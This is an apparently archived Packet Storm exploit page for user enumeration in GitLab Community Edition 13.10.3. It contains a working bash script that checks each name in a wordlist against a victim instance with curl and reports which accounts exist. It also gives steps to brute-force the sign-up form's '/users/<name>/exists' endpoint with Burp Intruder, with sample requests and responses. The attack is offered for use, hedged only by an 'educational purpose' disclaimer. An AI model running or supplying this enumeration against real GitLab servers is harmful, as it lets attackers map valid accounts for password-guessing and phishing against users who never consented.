what you don't know can hurt you

GitLab Community Edition (CE) 13.10.3 User Enumeration

GitLab Community Edition (CE) 13.10.3 User Enumeration
Posted May 3, 2021
Authored by 4D0niiS

GitLab Community Edition (CE) version 13.10.3 suffers from multiple user enumeration vulnerabilities.

tags | exploit, vulnerability
MD5 | 1e771f1c306635410687ca65cc0935eb

GitLab Community Edition (CE) 13.10.3 User Enumeration

Change Mirror Download
# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration
# Date: 4/29/2021
# Exploit Author: @4D0niiS [https://github.com/4D0niiS]
# Vendor Homepage: https://gitlab.com/
# Version: 13.10.3
# Tested on: Kali Linux 2021.1

#!/bin/bash

#Colors
RED='\033[38;5;196m'
GREEN='\e[38;5;47m'
NC='\033[0m'
BOLD='\e[1m'
PINK='\e[38;5;198m'
Italic='\e[3m'
BBlue='\e[44m'
YELLOW='\033[0;33m'

clear
echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}"
echo -e " ${BOLD}Version 1.0${NC}\n"
echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n"
echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only"
echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the"
echo -e "right permission is totally on your own risk.\n${NC}"
echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}"
echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo ""
echo ""



# Usage
usage() {
echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url <URL> --userlist <Username Wordlist>${NC}\n"

echo -e "${Italic}PARAMETERS:${NC}"
echo -e "-------------"
echo -e "-u/--url The URL of your victim's GitLab instance"
echo -e "--userlist Path to a username wordlist file (one per line)"
echo -e "-h/--help Show this help message and exit"
echo -e "\n"
echo -e "${Italic}Example:${NC}"
echo -e "-------------"
echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt"
}

#check for params
args=("$@")
URL=""
user_list=""

for (( i=0; i < $#; i++))
{
case ${args[$i]} in
--url | -u)
#GitLab's URL
URL=${args[$((i+1))]}
;;
--userlist)
#Username wordlist
user_list=${args[$((i+1))]}
;;
-h | --help | "")
#Help Menu
usage
exit 0
;;
esac
}


## checking the mandatory parameter (URL)
if [ -z "$URL" ]
then
usage
echo ""
echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}"
exit 0
fi


# User Enumeration Function
enumeration(){

while IFS= read -r line
do
echo "LOOP"
HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line)
echo $HTTP_Code
#echo "\n"
if [ $HTTP_Code -eq 200 ]
then
echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!"
#check the connection
elif [ $HTTP_Code -eq 000 ]
then
echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!"
exit 0
fi

done < "$user_list"

}



# Main
enumeration




----------------



# Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration
# Date: 4/29/2021
# Exploit Author: @4D0niiS [https://github.com/4D0niiS]
# Vendor Homepage: https://gitlab.com/
# Version: 13.10.3
# Tested on: Kali Linux 2021.1

INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up].

DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk.

STEPS: The required steps for this purpose are as follows:

1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username
2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow:
----------------------------------------------------------------------------------------------------------------------------------------------------------------
GET /users/testuser/exists HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/users/sign_up
X-CSRF-Token: <some value>
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: experimentation_subject_id=<some value>; known_sign_in=<some value>; _gitlab_session=<some value>
----------------------------------------------------------------------------------------------------------------------------------------------------------------
* note that the tested username (testuser) is in URI

3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter.
4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples:

-------------------------------------------The following response belongs to a valid user ------------------------------------------
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 19 Apr 2021 09:52:44 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 15
Connection: close
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"8063e5a51719c58189c7d5209a5f37b3"
Page-Title: GitLab
Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Gitlab-Feature-Category: users
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F
X-Runtime: 0.221557
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin

{"exists":true}

-------------------------------------------The following response belongs to an invalid user ------------------------------------------
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 19 Apr 2021 09:55:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 16
Connection: close
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"e39f603a5ebcff23859d200f9c9dc20f"
Page-Title: GitLab
Set-Cookie: _gitlab_session=<some value>; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Gitlab-Feature-Category: users
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0
X-Runtime: 0.033046
X-Ua-Compatible: IE=edge
X-Xss-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin

{"exists":false}

Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    26 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    2 Files
  • 9
    May 9th
    2 Files
  • 10
    May 10th
    13 Files
  • 11
    May 11th
    17 Files
  • 12
    May 12th
    22 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close